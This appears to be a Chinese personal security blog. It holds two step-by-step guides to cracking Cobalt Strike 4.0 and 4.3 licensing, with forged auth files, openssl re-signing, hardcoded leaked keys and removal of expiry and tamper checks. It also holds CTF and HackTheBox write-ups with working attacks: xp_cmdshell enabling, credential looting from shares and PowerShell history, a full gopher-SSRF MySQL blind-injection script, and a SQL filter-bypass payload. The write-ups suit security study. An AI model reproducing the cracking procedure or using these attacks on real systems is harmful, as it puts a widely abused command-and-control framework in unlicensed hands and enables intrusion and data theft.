Pr0ph3t's blog

[工具]Cobalt Strike4.3 破解日记

Wed, 09 Jun 2021 20:00:00 +0800

最新生活太难了，继续下去会有点自闭，所以趁着4.3出来还没多久，休闲一下换换情绪。

4.3的验证方式其实相较于4.0来说并没有发生多大的变化，只是在其中加入了一些垃圾数据而已。按需更改就好了，趁着这次把之前4.0没有分析明白的cobaltstrike.auth文件和整个验证流程好好理一理。
原版的话网上也挺多的，这里就不放了。
checksum
这里使用的不是最快速的方法，把这当成厕所读物就好了
还是回顾了一下零队的《Cobaltstrike 4破解之我自己给我自己颁发license》链接 / ca3tie1师傅的《CobaltStrike4.0无Hook蛮力Cracked License思路》链接

准备工作

请去参考4.0破解日记

验证过程

common/Authorization.java :12-28读取加密的cobaltstrike.auth文件，实例化common/AuthCrypto后进行解密工作的准备
读取resources/authkey.pub取出公钥 common/AuthCrypto.java 并且从构造器我们可以得知他的加密方式是RSA/ECB/PKCS1Padding需要注意的是Padding方式
然后简单的验证一下公钥的MD5是否对应，提取公钥。
回到common/Authorization.java :31开始解密，此时我们再去common/AuthCrypto.java : 47观察函数public byte[] decrypt(byte[] var1)此时真正的解密在protected byte[] _decrypt(byte[] var1)保护函数中，而解密的公共函数中还有验证cobaltstrike.auth的文件魔术头，转换方法在零队的文章中已经解释得很清楚了，这里就不再赘述了。计算过程： -889274157

原	反	补	十进制
1100 1010	0011 0101	0011 0110	-54
1111 1110	0000 0001	0000 0010	-2
1100 0000	0011 1111	0100 0000	-64
1101 0011	0010 1100	0010 1101	-45

最后计算出来前四个bytes是

byte[] header = {-54, -2, -64, -45};

代码中使用的是步进读取的方式操作的文件，所以我们要分清楚每个操作读了多少个字节（从common/DataParser.java能得知） readInt() 4个字节 readByte() 1个字节 readShort() 2个字节 readBytes(int n) n个字节 这里要注意的是代码line 64-65中还使用readShort()获取了剩下需要读取的数据长度，所以后面我们要删除垃圾操作/数据的时候需要更改此处最后回到common/Authorization.java，接下来就是真正的校验环节了，我们需要关注的是他的所有读取操作
- 一 line: 36 首先把解密后的raw文件使用DataParser封装，方便读取。
- 二 line: 38 读取过期时间，如果是29999999就是永久，转换方法和文件头一样
- 三 line: 39 读取水印值，具体是哪来干嘛的我也不太清楚，只知道如果值为0的话会帮你添加EICAR指纹，这里设置一个非0数值即可
- 四 line: 40 读取版本号进行简单的版本校验，这里设置一个大于等于43的值即可
- 五 line: 46-51 其实是一个读取垃圾值的操作，简单来说就是读取一个字节作为接下来的读取长度，然后读取垃圾值后扔掉循环3次，我嫌麻烦就直接删掉了
- 六 line: 52 读取sleeve keygen key的长度
- 七 line: 53 根据长度读取sleeve keygen key
- 八 line: 54-60 时间校验，根据步骤二中读出的值做判断
- 九其实到此为止已经完成了校验过程了，后续的sleeve keygen过程就没有再过多研究了，只是大概知道是生成解密各类dll/bin的key seed，有机会二开的时候再看看吧

文件解释

common/AuthCrypto.java 公钥相关的操作，比如读取公钥、解密CobaltStrike.auth、校验文件头等
common/Authorization.java 主要的校验代码，解密过后的CobaltStrike.auth中数据就在这检查
resources/authkey.pub 公钥匙，要求padding为PKCS#1
cobaltstrike.auth 经过私钥签名加密的校验信息，文件结构如下：

header	length	expire time	Version	垃圾数据x3	sleeve keygen key
文件魔术头	length of rest data	过期时间 29999999为永久	版本号	垃圾数据x3	最关键的sleeve keygen key
4个字节	2个字节	4个字节	1个字节	(1个字节的长度+对应长度的垃圾数据)x3	1个字节的长度+对应的key长度(这里为1+16个字节)

开始破解：

我们需要修改的东西为

使用网上已有的破解版获得authkey.pub和CobaltStrike.auth（如果新版本出来没有的话可以去尝试申请试用版获得）
使用openssl解密CobaltStike.auth，获得sleeve keygen key （这里哭一下当初找的破解版的CobaltStrike.auth作者把文件头校验和长度校验直接删掉了，在理清文件结构的时候踩了不少坑）
计算正确的header
计算正确的文件长度
填充各类校验字节，如时间/水印/版本/垃圾字符
重新生成公私钥
把重新写好的CobaltStrike.auth用私钥签名（使用openssl的时候注意参数是-sign 不是-encrypt，这里也踩了一个坑<-其实是密码学没学好，sign有两种形式，一个是直接把文件用私钥加密，一种是计算文件摘要并用私钥加密，这里我们使用第一种）
计算公钥的MD5并更改，扔进去
把CobaltStrike.auth扔进去
重新build jar，开始愉快的使用

命令相关：

生成公私钥（这里要注意的是使用2048bit和PKCS#1）

openssl genrsa -out pk.pem 2048

导出公钥

openssl rsa -in pk.pem -pubout -out pub.pem

签名

openssl rsautl -sign -inkey pk.pem -in cs4.3-plain.auth -out cobaltstrike.auth

检查签名

openssl rsautl -verify -pubin -inkey pub.pem -in cobaltstrike.auth

～

打完收工，最后提供一份我的cobaltstrike.auth文件内容（删了垃圾数据的）

c= [0xCA,0xFE,0xC0,0xD3,0x00,0x1A,0x01,0xC9,0xC3,0x7F,0x19,0x69,0xA0,0x8D,0x2B,0x10,0x3A,0x44,0x25,0x49,0x0F,0x38,0x9A,0xEE,0xC3,0x12,0xBD,0xD7,0x58,0xAD,0x2B,0x99]
with open('cs4.3-plain.auth','w+') as f:
    for s in c:
        f.write(chr(s))

神清气爽继续搬砖去了。。。。

参考：零队 ca3tie1

[HTB] Starting Point {1}

Sun, 27 Dec 2020 20:00:00 +0800

HackTheBox 启动！

首先基础的信息收集，使用nmap做基础的端口和系统扫描

nmap -sV -sC -Pn 10.10.10.27

Nmap scan report for 10.10.10.27
Host is up (0.21s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-12-26T13:02:11
|_Not valid after:  2050-12-26T13:02:11
|_ssl-date: 2020-12-26T13:15:30+00:00; +16m36s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h52m36s, deviation: 3h34m41s, median: 16m35s
| ms-sql-info:
|   10.10.10.27:1433:
|     Version:
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery:
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-26T05:15:20-08:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-26T13:15:19
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.82 seconds

发现域Archetype，135、139、445端口开放，使用探测一下SMB服务。

逐个尝试，发现backups允许匿名访问

直接挂载到本地，只有只读权限，里面存有一个SQL Server的SSIS文件，查看发现SQL Server的密码备份

<DTSConfiguration>
    <DTSConfigurationHeading>
        <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/>
    </DTSConfigurationHeading>
    <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
        <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
    </Configuration>
</DTSConfiguration>

直接连接1433，查看用户权限，发现在sysadmin组里，可以调用xp_cmdshell

然后调用getshell一把梭

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1;
reconfigure;
xp_cmdshell "whoami";

查看sql_svc用户桌面user.txt获得user flag 接下来就是提权，因为靶机有文件监控，一上传文件就会删除，所以没办法很好的通过文件落地的方式提权和做进一步的渗透。查看用户的powershell命令记录，能得到他用administrator挂载磁盘的命令记录，从而得到administrator的密码

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

使用Impacket工具集中的psexec.py连接后得到system的shell

这里其实理论上也可以使用msf的psexec，但是不知道为什么我不能反弹回shell或者执行命令（可能是和文件落地有关？）最后读取administrator桌面下的root.txt得到root flag

[工具]Cobalt Strike4.0 破解日记

Wed, 05 Aug 2020 20:00:00 +0800

好久没写东西了啊。。。。感觉都过去几万年了。。。感觉这两年自己变化也挺大的，决定了一些事情，做成了一些事情，错过了一些事情，反省了一些事情。是时候也更新一下这个封尘的博客了。最近发现cs4.0出来了，想着白嫖一波23333

在网上白嫖了其他师傅破解的，试用了几波之后发现有挺多问题的。比如net view会无回应，无法生成powershell马等等，一开始以为是4.0破解的通病，但是问了几位师傅之后发现只有我这发生了这种情况。。。所以就想着，反正有原版，索性自己搞一下。
感谢ssooking师傅的原版jar, 这里的原版是Cobalt Strike 4.0 (December 5, 2019) 558f61bfab60ef5e6bec15c8a6434e94249621f53e7838868cdb3206168a0937 Cobalt Strike 4.0 Licensed (cobaltstrike.jar) bug fixes之前的版本，不过这个问题不大，这个主要是修复了x64上线的问题
checksum
破解方法有很多种，这里采用的是改动最小（因为懒）的直接硬编码key覆盖掉。感谢coolcat师傅和其他师傅的无私贡献～
其余方法也有零队的《Cobaltstrike 4破解之我自己给我自己颁发license》链接 / ca3tie1师傅的《CobaltStrike4.0无Hook蛮力Cracked License思路》链接

准备工作

我用的是Mac，Windows可能稍有点区别但是区别应该不大
以下操作都在一个新建文件夹fuckcs4.0里

找到Idea的java反编译工具，Mac在路径/Applications/IntelliJ IDEA.app/Contents/plugins/java-decompiler/lib下，找到java-decompiler.jar copy出来一份，并建立文件夹cs_bin，把原版jar放进去

.
├── cs_bin
│   └── cobaltstrike.jar
├── cs_src
└── java-decompiler.jar

2 directories, 2 files

反编译原版jar待用，在java-decompiler.jar所在的目录执行

java -cp ./java-decompiler.jar org.jetbrains.java.decompiler.main.decompiler.ConsoleDecompiler -dgs=true cs_bin/cobaltstrike.jar ./cs_src

命令解释：因为java-decompiler.jar中的META-INF/MANIFEST.MF并没有定义可执行的主类，所以我们并不能使用java -jar去直接运行java-decompiler.jar

.
├── cs_bin
│   └── cobaltstrike.jar
├── cs_src
│   └── cobaltstrike.jar
└── java-decompiler.jar

2 directories, 3 files

在fuckcs4.0里面创建一个新的文件夹，名字为project，打开Idea新建工程，直接create一个普通的java project就行（一路next），把路径设置到我们刚新建的project文件夹，在project中再创建一个文件夹decompiled_src存放我们逆向之后的源码，把刚刚反编译后的jar放到这个文件夹之后解压，之后再创建一个lib文件夹，用于存放我们的原版jar。

然后在Files --> Project Structure --> Modules里面的 Dependencies – 加入Jar or directories, 把我们lib文件夹的原版jar加入到项目中，打上勾就好了。

最后在Files --> Project Structure --> Artifact里面添加Jar – From modules with dependencies, Main Class可以从原版的jar里面的META-INF/MANIFEST.MF看到是aggressor.Aggressor，填进去就行了。

至此准备工作已经差不多完成

改编不是乱编

example：

在src目录创建你要更改的文件以及对应的目录（和decompiled_src相同的目录），如：如果我要修改入口文件，也就是aggressor/Aggressor.java，那就要在src目录创建aggressor/Aggressor.java文件和对应的目录，并在里面作对应的更改，比如在运行cs的时候弹出一个消息框，修改后的源码如下：

package aggressor;

import aggressor.dialogs.ConnectDialog;
import aggressor.ui.UseSynthetica;
import common.Authorization;
import common.License;
import common.Requirements;
import sleep.parser.ParserConfig;

import javax.swing.*;

public class Aggressor {
    public static final String VERSION = "4.0 (20191205) " + (License.isTrial() ? "Trial" : "Licensed");
    public static MultiFrame frame = null;

    public static MultiFrame getFrame() {
        return frame;
    }

    public static void main(String[] var0) {
        JOptionPane.showMessageDialog(null, "Pr0ph3t!!!!!!!!!!!!!!!!!!!!!!!!"); //修改的代码
        ParserConfig.installEscapeConstant('c', "\u0003");
        ParserConfig.installEscapeConstant('U', "\u001f");
        ParserConfig.installEscapeConstant('o', "\u000f");
        (new UseSynthetica()).setup();
        Requirements.checkGUI();
        License.checkLicenseGUI(new Authorization());
        frame = new MultiFrame();
        (new ConnectDialog(frame)).show();
    }
}

然后在菜单栏有Build --> Build Artifact，运行之后在out/artifacts里面会有发现新编译好的jar，在Run --> Profile --> Edit Profile处添加一个Jar Application， Jar Path指向我们刚刚编译好的jar，VM Options填上-XX:+AggressiveHeap -XX:+UseParallelGC（如果不加的话会报错） Run之后发现还有报错，找不到cobaltstrike.auth文件然后我们把cobaltstrike.auth文件复制到我们生成的jar同目录下，再运行，就能出现我们熟悉的框框了 :(

.
├── cs_bin
│   └── cobaltstrike.jar
├── cs_src
│   └── cobaltstrike.jar
├── java-decompiler.jar
└── project
    ├── decompiled_src
    │   ├── LICENSE.txt
    │   ├── META-INF
    │   ├── NOTICE.TXT
    │   ├── aggressor
    │   ├── beacon
    │   ├── c2profile
    │   ├── cloudstrike
    │   ├── cobaltstrike.jar
    │   ├── com
    │   ├── common
    │   ├── console
    │   ├── cortana
    │   ├── data
    │   ├── de
    │   ├── dialog
    │   ├── dns
    │   ├── encoders
    │   ├── endpoint
    │   ├── eu
    │   ├── extc2
    │   ├── filter
    │   ├── graph
    │   ├── icmp
    │   ├── importers
    │   ├── java_cup
    │   ├── javax
    │   ├── kerberos
    │   ├── libicmp.so
    │   ├── libicmp64.so
    │   ├── libtapmanager.so
    │   ├── libtapmanager64.so
    │   ├── license
    │   ├── logger
    │   ├── mail
    │   ├── net
    │   ├── org
    │   ├── parser
    │   ├── pe
    │   ├── phish
    │   ├── profiler
    │   ├── proxy
    │   ├── report
    │   ├── resources
    │   ├── scripts
    │   ├── server
    │   ├── sleep
    │   ├── sleeve
    │   ├── socks
    │   ├── ssl
    │   ├── stagers
    │   ├── table
    │   ├── tap
    │   └── ui
    ├── fuckcs4.0.iml
    ├── lib
    │   └── cobaltstrike.jar
    ├── out
    │   ├── artifacts
    │   └── production
    └── src
        ├── META-INF
        ├── aggressor
        ├── beacon
        └── common

59 directories, 12 files

开始破解：

我们需要修改的东西为

绕过验证校验
过期问题
去除exit暗桩
修复x64上线问题

绕过验证校验：修改的文件在common/Authorization.java 把31行的密钥注释掉并填进正确的密钥（感谢无私奉献的师傅的密钥）

byte[] var4 = { 
          1, -55, -61, Byte.MAX_VALUE, 18, 52, 86, 120, 40, 16, 
          27, -27, -66, 82, -58, 37, 92, 51, 85, -114, 
          -118, 28, -74, 103, -53, 6 };

其实这时候已经是可以正常启动客户端了

但是过期、暗桩和x64上线问题我们还没有修改好

过期问题：修改的文件在common/Authorization.java

第9行把Authorization类中的valid改成true

第76行把isValid函数改成reture true

第92行把isExpired函数改成return false

去除exit暗桩：修改的文件在beacon/BeaconData.java

第48行shouldPad函数中的shouldPad变量改成false

修复x64上线问题修改的文件在aggressor/dialogs/WindowsExecutableDialog.java

第29行的dialogAction函数在生成stage可执行文件的时候并没有判断主机的架构是x86还是x64，统统都用了x86的payload，这里我们加一个判断就可以了

public void dialogAction(ActionEvent var1, Map var2) {
	this.options = var2;
	String var3 = DialogUtils.string(var2, "listener");
	//this.stager = ListenerUtils.getListener(this.client, var3).getPayloadStager("x86");
	boolean bool = DialogUtils.bool(this.options, "x64");  //增加判断
	if (bool) {
		this.stager = ListenerUtils.getListener(this.client, var3).getPayloadStager("x64");
	} else {
		this.stager = ListenerUtils.getListener(this.client, var3).getPayloadStager("x86");
	} 
	if (this.stager.length != 0) {
		String var4 = var2.get("output") + "";
		String var5 = "";
		if (var4.indexOf("EXE") > -1) {
			var5 = "artifact.exe";
		} else if (var4.indexOf("DLL") > -1) {
			var5 = "artifact.dll";
		}

		SafeDialogs.saveFile((JFrame)null, var5, this);
	}
}

～

至此我们的大致修改就已经完成了，修改完成打包好的文件就是生成的artifacts，直接替换原版的jar文件即可，mac用户想要弄成app的话可以使用jar2app，如果想要二次开发的话其实也是和这个流程类似。

水完了，溜！继续学习

参考： ssooking coolcat snowming 零队 ca3tie1

[题目]记一次利用gopher的内网mysql盲注

Wed, 02 May 2018 07:14:00 +0800

进去之后随便输账号密码登陆, 发现是个send.php在url后缀中,疑似文件包含,尝试用phpfilter发现可以任意读取,把源码down下来之后发现是个利用gopher的ssrf,题目已经提示得很明显了,利用站外location跳转到gopher协议下进行内网操作, 然后还能读到一个sql文件个conn.php,并且数据库无密码.那么应该是操作数据库了, 但是这里有两个问题,1:不知道数据库的端口 2:curl没有回显首先第一个问题我们直接去读取/proc/net/tcp看看本機的监听端口,发现一个80和一个1111,那毫无疑问1111就是mysql的端口了(端口以hex展示)

 sl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode                                                     
00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000 0 0 62508910 1 0000000000000000 100 0 0 10 0                  
00000000:0457 00000000:0000 0A 00000000:00000000 00:00000000 00000000 999 0 62513855 1 0000000000000000 100 0 0 10 0                  
040011AC:0050 09000A0A:ACAA 01 00000000:00000000 00:00000000 00000000 33 0 62524723 1 0000000000000000 20 4 32 10 -1                 

在说操作mysql之前我们先构造好gopher协议下的mysql数据包,这里我用的是tcpdump监听本地3306端口后再用wireshark提取出需要的数据包前置知识: tcp/ip方式连接mysql的过程(强行只说4.0以后的协议)

(图片来自https://segmentfault.com/a/1190000012166738) 所以我们需要3个包,一个是发送认证请求的包、一个发送我们query的包、一个quit包这里还涉及到一个小知识是mysql的用户认证是采用了挑战应答的方式,由服务器生成一个挑战数发送给用户之后用户用挑战数加密密码返回给服务器,服务器检查结果是否与预期相同, 这里需要无授权mysql用户的原因就是如果密码为空的话挑战加密结果就是空, 这样的话认证数据包就能每次相同了 query包则相对结构简单,quit包格式固定

首先tcpdump -i lo0 -w mysql.pcap port 3306 -i网卡 -w导出到文件然后本地马上TCP/IP方式连接数据库进行select操作, 最后exit

将需要的请求包的原始数据(hex)拿下来之后转换成urlencoded的格式利用gopher协议访问类似于这样:

返回到了我们期望的0

然后我们解决没有回显的问题: 方法一:采用带外攻击尝试利用dns查询带出去,推荐ceye.io (此方法不可用经Gaia大佬的提醒因为只有windows才有unc路径Orz..) 方法二:采用dumpfile的方式写文件到tmp目录后读取 (后来发现此mysql用户没有写权限) 方法三:最蠢的方法, 直接利用时间盲注 (最后用了这个方法)
然后最后一点需要注意的是在盲注的过程中数据包的长度会变化,要更改数据包包头长度脚本:

import requests
import time
import os

url = 'http://70341201160745d19d1b8a9141e72eb87f773104453749c8.game.ichunqiu.com/index.php?page=send.php'
headers = {
'Host': '70341201160745d19d1b8a9141e72eb87f773104453749c8.game.ichunqiu.com',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:48.0) Gecko/20100101 Firefox/48.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Accept-Encoding': 'gzip, deflate',
'Referer': 'http://70341201160745d19d1b8a9141e72eb87f773104453749c8.game.ichunqiu.com/index.php?page=send.php',
'Cookie': 'Hm_lvt_1a32f7c660491887db0960e9c314b022=1503915500; Hm_lvt_9104989ce242a8e03049eaceca950328=1499841280,1499841321,1500792273; pgv_pvi=2458169344; Hm_lvt_2d0601bd28de7d49818249cf35d95943=1509698028,1511583430,1511759905; UM_distinctid=1621015174e3f-07d3d76d358413-485860-384000-1621015174f3eb; PHPSESSID=p2aqa6ls1v5pvrlvt40599ino4',
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
}
remote = 1
se = requests.Session()
raw_conn = 'a400000105a6ff0100000001210000000000000000000000000000000000000000000000446f6700006d7973716c5f6e61746976655f70617373776f72640068035f6f73086f737831302e31330c5f636c69656e745f6e616d65086c69626d7973716c045f70696404353133300f5f636c69656e745f76657273696f6e06352e372e3231095f706c6174666f726d067838365f36340c70726f6772616d5f6e616d65056d7973716c'
# raw_select_db = '120000000353454c45435420444154414241534528290b00000002757365725f61646d696e'
raw_blind_query = '%s0000000373656c65637420696628617363696928737562737472282873656c6563742067726f75705f636f6e63617428757365726e616d652c70617373776f7264292066726f6d20757365725f61646d696e2e61646d696e292c%s2c3129293d%s2c736c6565702835292c3029'
raw_end_conn = '0100000001'
content = 'adminfla'

for x in xrange(8,100):
 for y in xrange(33,126):
  packet_length = 107
  if x >= 10 :
   packet_length += 1
  if x >= 100:
   packet_length += 1
  if y >= 100 :
   packet_length += 1
  b = []
  raw_code = (raw_conn + raw_blind_query + raw_end_conn) % (hex(packet_length)[2:], str(x).encode('hex'), str(y).encode('hex'))
  # print raw_code
  # exit()
  l = len(raw_code)
  for z in xrange(l):
   if z % 2 == 0:
    b.append(raw_code[z:z+2])
  urlencoded = '%' + '%'.join(b)
  # payload = 'gopher://127.0.0.1:1111/_' + urlencoded
  if remote == 0:
   payload = 'gopher://127.0.0.1:3306/_' + urlencoded
   s = time.time()
   os.system('curl ' + payload)
   # print payload
   # exit()
   if time.time() - s >= 5:
    print 'found! ' + chr(y)
    break
   else:
    print y
  elif remote == 1:
   payload = 'gopher://127.0.0.1:1111/_' + urlencoded
   with open('index.php','wb') as f:
    f.write('<?php\nheader(\'Location:' + payload + '\');\n')
   try:
    s = time.time()
    res = se.post(url, headers=headers, data={'url':'http://xxx.xxx.xxx.xxx'})
    # print res.status_code
    time.sleep(0.1);
    if time.time() - s >= 5.1 and res.status_code == 200:
     content += chr(y)
     print 'Found!! ' + chr(y)
     print content
     break
    else:
     print y
   except Exception as e:
    pass

poc: flag在admin表内

参考文章： http://www.freebuf.com/articles/web/159342.html https://segmentfault.com/a/1190000012166738

[hitctf] Web Writeup

Sat, 03 Feb 2018 11:25:00 +0800

PHP reading

上扫描器扫出index.php.bak 下载”源码”

<?php 
    eval(base64_decode('JGZsYWc9JF9HRVRbJ2FzZGZnanh6a2FsbGdqODg1MiddO2lmKCRmbGFnPT0nSDFUY3RGMjAxOEV6Q1RGJyl7ZGllKCRmbGFnKTt9ZGllKCdlbW1tbScpOw=='))
?>

里面的内容base64decode之后是源码

$flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm');

输入urlhttp://198.13.58.35:8899?asdfgjxzkallgj8852= H1TctF2018EzCTF之后得到flag

BabyEval

进入之后查看html源码发现题目源码

<!--
$str=@(string)$_GET['str'];
blackListFilter($black_list, $str);
eval('$str="'.addslashes($str).'";');
-->

以前一航师傅分析过这一题 https://www.jianshu.com/p/dd72566ca4df 我觉得可能是可变变量的简写形式导致的这个问题,如文档所说

$aaa = 'phpinfo';
$b = 'aaa';
echo $$b; //输出phpinfo

////////////

$a = 'phpinfo';
$b = 'aaa';
echo ${$b}; //也输出phpinfo
//则以下也是正确的
echo ${'aaa'}; //也输出phpinfo
echo ${'a'+'aa'}; //也输出phpinfo

做了一下尝试,花括号内是可以执行运算的,并且会强制类型转换成字符串,猜测是类似一个eval再强制转换成字符串?留个坑…以后研究源码的时候再看看….

BabyLeakage

题目疯狂引导我们去使应用出错
首先试一试url方面
逐个尝试之后在news/auth路由下发现了一个奇怪的报错其中更是爆出了mysql的账号密码
我们探测一下该ip的mysql默认端口的情况
既然开启的话我们尝试远程登录 bingo!
最后在F1agIsHere库的表描述下找到flag

mysql> use F1agIsHere;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+----------------------+
| Tables_in_F1agIsHere |
+----------------------+
| a                    |
| f                    |
| g                    |
| l                    |
+----------------------+
4 rows in set (0.05 sec)

mysql> describe f;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| H     | text | YES  |     | NULL    |       |
| I     | text | YES  |     | NULL    |       |
| TC    | text | YES  |     | NULL    |       |
| T     | text | YES  |     | NULL    |       |
| F     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
5 rows in set (0.04 sec)

mysql> describe l;
+---------+------+------+-----+---------+-------+
| Field   | Type | Null | Key | Default | Extra |
+---------+------+------+-----+---------+-------+
| {       | text | YES  |     | NULL    |       |
| C10se_  | text | YES  |     | NULL    |       |
| Debu91n | text | YES  |     | NULL    |       |
+---------+------+------+-----+---------+-------+
3 rows in set (0.05 sec)

mysql> describe a;
+----------+------+------+-----+---------+-------+
| Field    | Type | Null | Key | Default | Extra |
+----------+------+------+-----+---------+-------+
| fo_Is_Im | text | YES  |     | NULL    |       |
| mmp      | text | YES  |     | NULL    |       |
| ort      | text | YES  |     | NULL    |       |
+----------+------+------+-----+---------+-------+
3 rows in set (0.05 sec)

mysql> describe g;
+-------+------+------+-----+---------+-------+
| Field | Type | Null | Key | Default | Extra |
+-------+------+------+-----+---------+-------+
| 4n7   | text | YES  |     | NULL    |       |
| }     | text | YES  |     | NULL    |       |
+-------+------+------+-----+---------+-------+
2 rows in set (0.06 sec)

mysql> 

BabyInjection

题目给了源码

<?php
error_reporting(0);

if (!isset($_POST['username']) || !isset($_POST['passwd'])) {
    echo 'Login and get the flag';
    echo '<form action="" method="post">'."<br/>";
    echo '<input name="username" type="text" placeholder="username"/>'."<br/>";
    echo '<input name="passwd" type="text" placeholder="passwd"/>'."<br/>";
    echo '<input type="submit" ></input>'."<br/>";
    echo '</form>'."<br/>";
    die;
}

$flag = '';
$filter = "and|select|from|where|union|join|sleep|benchmark|,|\(|\)|like|rlike|regexp|limit|or";

$username = $_POST['username'];
$passwd = $_POST['passwd'];
if (preg_match("/".$filter."/is",$username)==1){
    die("Hacker hacker hacker~");
}
if (preg_match("/".$filter."/is",$passwd)==1){
    die("Hacker hacker hacker~");
}

$conn = mysqli_connect();

$query = "SELECT * FROM users WHERE username='{$username}';";
echo $query."<br>";
$query = mysqli_query($conn, $query);
if (mysqli_num_rows($query) == 1){
    $result = mysqli_fetch_array($query);
    if ($result['passwd'] == $passwd){
        die('you did it and this is your flag: '.$flag);
    }
    else{
        die('Wrong password');
    }
}
else{
    die('Wrong username');
}

ban掉了很多关键字而且从ban list里面感觉到出题人并不是想我们找出真正的密码,而是单纯的绕过,是以前碰到的一个题目的套路,首先可以用group by passwd with rollup来制造一个空行(利用统计函数,查询结果多一行并且passwd为空),这里本来可以直接用limit筛选出我们需要的那个空行,但是这里limit被ban了,没关系,还可以用having子句来筛选出我们需要的带有空字段的行,因为having子句是再分组查询之后再执行的,所以最后post payload如下username='|| 1 group by passwd with rollup having passwd is null#&passwd=

mysql> use test;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> describe test;
+-------+--------------+------+-----+---------+-------+
| Field | Type         | Null | Key | Default | Extra |
+-------+--------------+------+-----+---------+-------+
| id    | int(11)      | NO   | PRI | NULL    |       |
| phone | varchar(255) | YES  |     | NULL    |       |
+-------+--------------+------+-----+---------+-------+
2 rows in set (0.00 sec)

mysql> select * from test;
+----+---------+
| id | phone   |
+----+---------+
|  1 | ' or 1# |
+----+---------+
1 row in set (0.00 sec)

mysql> select id,phone from test where id=0 or 1 group by id,phone with rollup;
+----+---------+
| id | phone   |
+----+---------+
|  1 | ' or 1# |
|  1 | NULL    |
| NULL | NULL    |
+----+---------+
3 rows in set (0.00 sec)

mysql> select id,phone from test where id=0 or 1 group by id with rollup;
+----+---------+
| id | phone   |
+----+---------+
|  1 | ' or 1# |
| NULL | ' or 1# |
+----+---------+
2 rows in set (0.00 sec)

mysql> select id,phone from test where id=0 or 1 group by phone with rollup;
+----+---------+
| id | phone   |
+----+---------+
|  1 | ' or 1# |
|  1 | NULL    |
+----+---------+
2 rows in set (0.00 sec)

mysql> select id,phone from test where id=0 or 1 group by phone with rollup having phone is null;
+----+-------+
| id | phone |
+----+-------+
|  1 | NULL  |
+----+-------+
1 row in set (0.01 sec)

mysql> 

小电影

ffmpeg的漏洞http://www.freebuf.com/column/142775.html exp : https://github.com/neex/ffmpeg-avi-m3u-xbin 根据html源码提示利用exp去读flag文件即可

SecurePY

hint说python的缓存,并且给了uwsgi的配置项

在http://123.206.83.157:8000/__pycache__/app.cpython-35.pyc下载源码,源码如下:

#!/usr/bin/env python
# visit http://tool.lu/pyc/ for more information
from flask import Flask, request, jsonify, render_template
from Crypto.Cipher import AES
from binascii import b2a_hex, a2b_hex
import os
app = Flask(__name__)
flag_key = os.environ['KEY']
flag_enc = '9cf742955633f38d9c628bc9a9f98db042c6e4273a99944bc4cd150a0f7b9f317f52030329729ccf80798690667a0add'

def index():
    return render_template('index.html', flag_enc = flag_enc)

index = app.route('/')(index)

def getflag():
    req = request.json
    if not req:
        return jsonify(result = False)
    if None not in req:
        return jsonify(result = False)
    key = req['key']
    if len(key) != len(flag_key):
        return jsonify(result = False)
    for (x, y) in zip(key, flag_key):
        if ord(x) ^ ord(y):
            return jsonify(result = False)
    cryptor = AES.new(key, AES.MODE_CBC, b'0000000000000000')
    plain_text = cryptor.decrypt(a2b_hex(flag_enc))
    flag = plain_text.decode('utf-8').strip()
    return jsonify(result = True, flag = flag)

getflag = app.route('/getflag', methods = [
    'POST'])(getflag)
if __name__ == '__main__':
    app.run()

